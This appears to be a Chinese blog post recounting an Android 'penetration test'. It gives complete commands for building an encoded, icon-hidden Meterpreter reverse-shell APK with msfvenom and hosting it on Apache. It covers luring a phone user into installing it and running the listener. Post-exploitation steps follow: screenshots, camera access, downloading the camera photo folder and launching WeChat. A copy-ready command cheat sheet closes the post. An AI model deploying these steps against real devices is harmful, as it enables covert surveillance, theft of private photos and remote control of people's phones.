news 2026/4/23 21:28:04

Android 渗透测试实战全流程复盘 (2026.01.15)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Android 渗透测试实战全流程复盘 (2026.01.15)

一、 环境准备与信息搜集

1. 确定攻击机 IP 地址

在 Kali Linux 终端执行ifconfigip addr,找到连接同一 WiFi 的网卡 IP。

  • 今晚实战 IP10.205.105.150
  • 重要性:这是木马回连的 “指挥中心” 地址,必须确保靶机手机能 Ping 通此 IP。

2. 靶机环境确认

  • 目标系统:Android 11+ (高版本,权限限制较严)
  • 网络环境:与 Kali 处于同一 WiFi 网段。
  • 前置条件:手机需开启 “允许安装未知来源应用” 权限(针对浏览器或文件管理器)。

二、 恶意载荷(Payload)生成与部署

1. 使用 msfvenom 生成木马 APK

利用 Metasploit 内置工具生成 Android 后门程序。

  • 核心命令

    bash

    运行

    msfvenom -p android/meterpreter/reverse_tcp \ LHOST=10.205.105.150 \ LPORT=4444 \ -o /var/www/html/hack.apk \ --platform android \ --arch dalvik \ AndroidMeterpreter::Options::HideAppIcon=true \ --encoder x86/shikata_ga_nai -i 3
  • 参数详解
    • -p:指定载荷为安卓反向 TCP Shell。
    • LHOST/LPORT:监听主机 IP 和端口。
    • -o:输出路径(直接放入 Apache 网站根目录/var/www/html/)。
    • HideAppIcon=true:生成无图标木马(隐蔽性)。
    • --encoder:编码免杀(尝试绕过简单的杀软)。

2. 启动 Web 服务 (Apache)

为了让手机通过浏览器下载木马。

  • 启动命令

    bash

    运行

    service apache2 restart
  • 本地测试

    bash

    运行

    curl http://10.205.105.150/hack.apk
    • 现象:显示乱码(二进制数据),说明文件存在且服务正常。

三、 监听与上线(获取会话)

1. 配置 Metasploit 监听器

在 Kali 终端打开msfconsole

  • 配置流程

    bash

    运行

    use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 0.0.0.0 # 监听本机所有接口 set LPORT 4444 run

2. 诱导靶机上线

  • 操作:在靶机手机浏览器输入http://10.205.105.150/hack.apk
  • 关键点
    • 浏览器可能提示 “不支持的文件类型”,需长按链接选择 “下载链接” 或使用 Chrome 浏览器。
    • 安装时需授权 “来自未知来源的应用”。
    • 安装后桌面无图标(因开启了 HideAppIcon),但进程已在后台运行。

3. 成功标志

Kali 终端显示:

text

[*] Meterpreter session X opened (10.205.105.150:4444 -> ...)

四、 后渗透攻击(核心操作与排错)

进入meterpreter >提示符后,执行的操作。

1. 基础信息搜集

  • 查看系统信息sysinfo
  • 查看摄像头webcam_list
    • 实战问题:Android 11+ 限制后台调用摄像头,直接拍照可能失败 (Operation failed: 1)。
    • 解决方案:改用screenshot截图或授予权限(grant_permission android.permission.CAMERA)。
  • 下载文件download /sdcard/DCIM/Camera(下载照片)

2. APP 管理(重难点攻克)

方法 A:使用 Meterpreter 扩展(推荐)
  1. 加载扩展

    bash

    运行

    load appapi
  2. 列出所有 APP(含第三方):

    bash

    运行

    app_list -a
    • 实战问题:中文乱码。
    • 解决方案:忽略名称,关注Package列(包名),或导出到文件查看。
  3. 启动 APP

    bash

    运行

    app_run <包名>
方法 B:使用 Android 原生 Shell(兜底方案)

当 Meterpreter 命令失效时使用。

  1. 进入 Shell

    bash

    运行

    shell -t 30 # -t 30 防止超时断开
  2. 查找包名

    bash

    运行

    pm list packages | grep <关键词> # 如 grep tencent, grep browser
  3. 启动 APP

    bash

    运行

    am start -n <包名>/.<主Activity> # 简化版: am start <包名>
  4. 退出 Shell

    bash

    运行

    exit

3. 可视化验证

  • 截图命令screenshot
    • 作用:验证 APP 是否启动、查看手机当前界面。
    • 注意:旧版命令screencap在新版中已变更为screenshot

五、 常见故障排除(Troubleshooting)

这是今晚实战中遇到的 “坑” 及解决方案,非常重要

故障现象原因分析解决方案
Send timed out会话超时或网络不稳定1. 尝试sessions -i <ID>重连。2. 若无效,手机重新安装 APK 触发上线。
Permission Denial: INTERACT_ACROSS_USERS_FULLAndroid 11+ 安全机制,禁止跨用户启动前台 Activity1. 忽略报错,截图确认是否启动。2. 使用am start的简化版。3. 尝试授予android.permission.INTERACT_ACROSS_USERS_FULL(通常失败)。
Unknown command: screencapMeterpreter 版本更新,命令变更使用新命令:screenshot
APP 列表中文乱码终端编码问题1. 只看Package列(英文包名)。2. 使用pm list packages在 Shell 中查看。
摄像头拍照失败高版本安卓限制后台调用摄像头使用screenshot截取屏幕画面作为替代。

六、 完整命令速查表(可直接复制)

bash

运行

# === 阶段一:生成木马 === service apache2 start msfvenom -p android/meterpreter/reverse_tcp LHOST=10.205.105.150 LPORT=4444 -o /var/www/html/hack.apk AndroidMeterpreter::Options::HideAppIcon=true # === 阶段二:启动监听 === msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 run # === 阶段三:控制靶机 === # 基础信息 sysinfo webcam_list screenshot # 核心验证命令 # APP 操作 load appapi app_list -a app_run com.tencent.mm # 示例:启动微信 # 文件操作 download /sdcard/DCIM/Camera # 原生 Shell 操作 shell -t 30 pm list packages | grep tencent am start com.tencent.mm exit
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/22 18:43:50

安卓 WiFi 钓鱼渗透测试全流程教程(详细版)

一、核心目标通过社会工程学伪装 WiFi 钓鱼 安卓木马远控&#xff0c;模拟真实渗透场景&#xff0c;实现对安卓手机的远程控制&#xff0c;掌握从 “陷阱搭建→诱捕下载→权限突破→持久化控制” 的完整渗透链路。二、环境准备1. 硬件 / 系统要求Kali Linux&#xff08;任意版…

作者头像 李华
网站建设 2026/4/18 21:58:11

UI-TARS-desktop效果展示:AI助手如何提升工作效率

UI-TARS-desktop效果展示&#xff1a;AI助手如何提升工作效率 1. 引言&#xff1a;多模态AI代理的效率革命 在现代办公环境中&#xff0c;重复性任务、跨平台操作和信息碎片化已成为影响生产力的主要瓶颈。传统的自动化工具往往依赖于固定的脚本逻辑与API接口&#xff0c;难以…

作者头像 李华
网站建设 2026/4/22 22:33:59

分割一切再进化:SAM3学生优惠套餐详解

分割一切再进化&#xff1a;SAM3学生优惠套餐详解 你有没有想过&#xff0c;只要说一句“把图里的狗都圈出来”&#xff0c;AI就能自动识别并精准分割出画面中所有狗狗的轮廓&#xff1f;这不再是科幻场景。Meta最新发布的SAM3&#xff08;Segment Anything Model 3&#xff0…

作者头像 李华
网站建设 2026/4/23 16:26:49

5分钟部署Qwen3-4B-Instruct-2507:中小企业AI助手零基础搭建指南

5分钟部署Qwen3-4B-Instruct-2507&#xff1a;中小企业AI助手零基础搭建指南 1. 引言&#xff1a;轻量大模型时代已来 在人工智能加速落地的今天&#xff0c;越来越多中小企业希望引入AI能力提升效率&#xff0c;但高昂的硬件成本、复杂的部署流程和数据安全顾虑成为主要障碍…

作者头像 李华
网站建设 2026/4/20 10:44:14

DeepSeek-R1知识库应用:云端快速搭建,支持私有数据

DeepSeek-R1知识库应用&#xff1a;云端快速搭建&#xff0c;支持私有数据 在企业数字化转型的浪潮中&#xff0c;如何高效管理内部文档、技术资料和业务流程成为一大挑战。员工常常面临“信息找不到、知识难共享”的困境——新员工入职要花几周时间翻阅历史文档&#xff0c;技…

作者头像 李华
网站建设 2026/4/22 4:33:31

AutoGLM-Phone-9B多模态移动端部署实战|基于轻量化GLM架构的高效推理

AutoGLM-Phone-9B多模态移动端部署实战&#xff5c;基于轻量化GLM架构的高效推理 1. 引言&#xff1a;移动端多模态大模型的落地挑战 随着大语言模型在文本生成、对话理解等任务中展现出强大能力&#xff0c;多模态融合成为下一代智能应用的核心方向。然而&#xff0c;在资源…

作者头像 李华